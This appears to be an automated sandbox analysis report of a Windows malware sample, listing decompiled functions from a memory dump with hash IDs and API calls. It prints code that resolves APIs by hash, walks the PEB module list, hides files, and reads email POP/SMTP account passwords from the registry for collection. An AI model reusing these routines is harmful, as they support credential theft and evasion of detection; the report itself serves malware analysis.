                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _t5;
                      
                      				_t5 = _a12;
                      				if(_t5 == 0) {
                      					_t5 = E00405D0B(_a8) + 1;
                      				}
                      				__imp__#19(_a4, _a8, _t5, 0); // executed
                      				return _t5;
                      			}

                      0x00404eed
                      0x00404ef2
                      0x00404efd
                      0x00404efd
                      0x00404f07
                      0x00404f0e

                      APIs
                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                      				int _t6;
                      				void* _t7;
                      
                      				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                      				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                      				return _t6;
                      			}

                      0x00403bdd
                      0x00403beb
                      0x00403bee

                      APIs
                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040427D(WCHAR* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                      				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                      				return _t4;
                      			}

                      APIs
                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404A19(void* _a4, short* _a8, void** _a12) {
                      				long _t5;
                      				void* _t6;
                      
                      				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                      				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                      				return _t5;
                      			}

                      APIs
                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C40(void* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                      				_t4 = FindCloseChangeNotification(_a4); // executed
                      				return _t4;
                      			}

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C08(WCHAR* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                      				_t4 = DeleteFileW(_a4); // executed
                      				return _t4;
                      			}

                      APIs
                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402C1F(WCHAR* _a4) {
                      				struct HINSTANCE__* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                      				_t4 = LoadLibraryW(_a4); // executed
                      				return _t4;
                      			}

                      APIs
                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BEF(void* _a4) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                      				_t4 = FindClose(_a4); // executed
                      				return _t4;
                      			}

                      APIs
                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403BB7(WCHAR* _a4) {
                      				long _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                      				_t4 = GetFileAttributesW(_a4); // executed
                      				return _t4;
                      			}

                      APIs
                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004049FF(void* _a4) {
                      				long _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                      				_t3 = RegCloseKey(_a4); // executed
                      				return _t3;
                      			}

                      APIs
                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403B64(WCHAR* _a4) {
                      				int _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                      				_t3 = PathFileExistsW(_a4); // executed
                      				return _t3;
                      			}

                      APIs
                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID:
                      • API String ID: 1174141254-0
                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: closesocket
                      • String ID:
                      • API String ID: 2781271927-0
                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403F9E(void* _a4) {
                      				int _t3;
                      				void* _t4;
                      
                      				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                      				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                      				return _t3;
                      			}

                      APIs
                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406472(long _a4) {
                      				void* _t3;
                      				void* _t4;
                      
                      				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                      				Sleep(_a4); // executed
                      				return _t3;
                      			}

                      APIs
                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004058EA(char* _a4, char* _a8) {
                      				char* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                      				_t4 = StrStrA(_a4, _a8); // executed
                      				return _t4;
                      			}

                      APIs
                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
                      				WCHAR* _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                      				_t4 = StrStrW(_a4, _a8); // executed
                      				return _t4;
                      			}

                      APIs
                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t40;
                      				intOrPtr _t45;
                      				intOrPtr _t47;
                      				void* _t71;
                      				void* _t75;
                      				void* _t77;
                      
                      				_t72 = _a4;
                      				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                      				_t81 = _t71;
                      				if(_t71 != 0) {
                      					_push(__ebx);
                      					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                      					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                      					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                      					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                      					_v8 = _v8 & 0x00000000;
                      					_v20 = _t40;
                      					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                      					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                      					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                      					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                      					_v12 = _v12 & 0x00000000;
                      					_v32 = _t45;
                      					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                      					_t77 = _t75 + 0x50;
                      					_v36 = _t47;
                      					if(_v8 != 0 || _v12 != 0) {
                      						E00405872( *0x49f934, _t71, 1, 0);
                      						E00405872( *0x49f934, _t67, 1, 0);
                      						_t74 = _v16;
                      						E00405872( *0x49f934, _v16, 1, 0);
                      						E00405781( *0x49f934, _v40);
                      						E00405872( *0x49f934, _v20, 1, 0);
                      						_push(_v8);
                      						E00405762(_v16,  *0x49f934, _v24);
                      						E00405872( *0x49f934, _v28, 1, 0);
                      						E00405781( *0x49f934, _v44);
                      						E00405872( *0x49f934, _v32, 1, 0);
                      						_push(_v12);
                      						E00405762(_t74,  *0x49f934, _v36);
                      						_t77 = _t77 + 0x88;
                      					} else {
                      						_t74 = _v16;
                      					}
                      					E0040471C(_t71);
                      					E0040471C(_t67);
                      					E0040471C(_t74);
                      					E0040471C(_v20);
                      					E0040471C(_v24);
                      					E0040471C(_v28);
                      					E0040471C(_v32);
                      					E0040471C(_v36);
                      				}
                      				return 1;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      /* Walks the PEB loader module list and returns the base address of the
                         module whose (hashed) name matches _a4. The helper functions it calls
                         (E00402C77, E004032EA, E00402C38, E00405D24) are defined elsewhere in
                         the sample; their behaviour is inferred from how they are used here. */
                      E0040317B(intOrPtr _a4) {
                          signed int _v8;
                          intOrPtr _v12;
                          void* __ecx;
                          intOrPtr _t17;
                          void* _t21;
                          intOrPtr* _t23;
                          void* _t26;
                          void* _t28;
                          intOrPtr* _t31;
                          void* _t33;
                          signed int _t34;

                          _push(_t25);
                          _t1 =  &_v8;
                          *_t1 = _v8 & 0x00000000;
                          _t34 =  *_t1;
                          _v8 =  *[fs:0x30];                                        /* PEB (TEB+0x30) */
                          _t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc)); /* PEB->Ldr (+0xc) -> InLoadOrderModuleList.Flink (+0xc) */
                          _t31 = _t23;
                          do {
                              _v12 =  *((intOrPtr*)(_t31 + 0x18));                 /* LDR_DATA_TABLE_ENTRY->DllBase */
                              _t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28))); /* FullDllName.Buffer -> working copy of the name */
                              _pop(_t26);
                              _t35 = _t28;
                              if(_t28 == 0) {
                                  goto L3;                                           /* name conversion failed: next entry */
                              } else {
                                  E004032EA(_t35, _t28, 0);                          /* normalises the copied name (likely case folding) */
                                  _t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19); /* hash over the name length */
                                  _t33 = _t33 + 0x14;
                                  if(_a4 == _t21) {                                  /* hash matches the requested module */
                                      _t17 = _v12;                                   /* return its DllBase */
                                  } else {
                                      goto L3;
                                  }
                              }
                              L5:
                              return _t17;
                              L3:
                              _t31 =  *_t31;                                         /* InLoadOrderLinks.Flink: advance to next entry */
                          } while (_t23 != _t31);                                    /* stop when the list wraps around */
                          _t17 = 0;                                                  /* not found */
                          goto L5;
                      }

                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                      Uniqueness

                      Uniqueness Score: -1.00%